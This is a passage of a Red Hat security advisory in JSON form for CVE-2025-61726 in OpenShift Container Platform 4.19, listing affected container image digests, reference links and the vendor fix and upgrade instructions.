"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T10:18:08+00:00",
"details": "For OpenShift Container Platform 4.19 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html/release_notes/\n\nYou may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.\n\nThe sha values for the release are as follows:\n\n (For x86_64 architecture)\n The image digest is sha256:b274766f7194a7dc825e335a54078790519c0dbe3431c029fd08dbba1c431855\n\n (For s390x architecture)\n The image digest is sha256:066bfcb590ef6f34106e63861d420a3fdcdebd734bb729668c8c6de59b84c632\n\n (For ppc64le architecture)\n The image digest is sha256:ff14e60b2b4760a6c2578e444b40f457fe2322f5211b1b838078b1fa6ea1b443\n\n (For aarch64 architecture)\n The image digest is sha256:52b1e8cf83dd1a854194212cc94bfe2719afb2e014f7b1a315250a9c7273a600\n\nAll OpenShift Container Platform 4.19 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html-single/updating_clusters/index#updating-cluster-cli.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:7249"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
